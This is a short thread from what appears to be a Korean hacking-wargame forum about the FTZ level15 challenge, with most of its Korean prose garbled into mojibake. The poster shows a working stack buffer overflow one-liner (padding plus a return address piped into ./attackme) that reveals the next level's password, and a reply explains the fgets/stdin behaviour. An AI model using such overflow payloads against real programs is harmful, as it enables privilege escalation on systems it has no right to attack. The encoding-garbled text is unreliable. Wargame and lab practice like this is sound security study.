½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ka0r1
   ÀÌ µÎ°³ÀÇ ¸í·É¾îÀÇ Â÷ÀÌÁ¡ÀÌ ¹º°¡¿ä?

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1907 [º¹»ç]


[level15@ftz level15]$ (python -c 'print "A"*40+"\xb2\x84\x04\x08"';cat) | ./attackme
my-pass

Level16 Password is "xxxxxxxxxxxxxxxxxxxxxxxxx".


[4]+  Stopped                 ( python -c 'print "A"*40+"\xb2\x84\x04\x08"'; cat ) | ./attackme
[level15@ftz level15]$ ./attackme | (python -c 'print "A"*40+"\xb2\x84\x04\x08"';cat)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA©÷„
my-pass
[level15@ftz level15]$












attackÀÌ ¾Õ¿¡ ÀÖÀ» ¶© level16±ÇÇÑÀ» Ãëµæ ¸øÇÏ°í
attackÀÌ µÚ¿¡ ÀÖÀ» ¶© level16±ÇÇÑÀ» ÃëµæÇÕ´Ï´Ù.
  Hit : 2730     Date : 2017/12/20 01:09


    
gihacker 15¹ø ¹®Á¦ ¼Ò½º¸¦ º¸½Ã¸é

fgets(buf, 45, stdin);

stdin À¸·Î buf º¯¼ö¿¡ 45¹ÙÀÌÆ®¸¦ ÀԷ¹ްí Àֳ׿ä

±×·¡¼­ attackme ÀÇ ÀÎÀÚ·Î ÆäÀ̷ε带 Àü´ÞÇغÁ¾ß buf¿¡´Â ¾Æ¹«°Íµµ Àü´ÞµÇÁö ¾Ê½À´Ï´Ù

¸¸¾à¿¡ attackme ÀÇ Ã¹¹ø° ÀÎÀڷκÎÅÍ buf ¿¡ °ªÀ» ÀÔ·ÂÇÑ´Ù¸é ÇØÅ·ÀÌ µÇÁö¸¸ Áö±Ý ¹®Á¦´Â

stdin À» »ç¿ëÇÏ¿© ÀÔ·ÂÀ» ¹Þ±â¶§¹®¿¡ ¾ÈµÇ´Â°Å¿¡¿ä		 2017/12/20  
ka0r1 gilhacker // ´äº¯ °¨»çÇÕ´Ï´Ù. 2017/12/22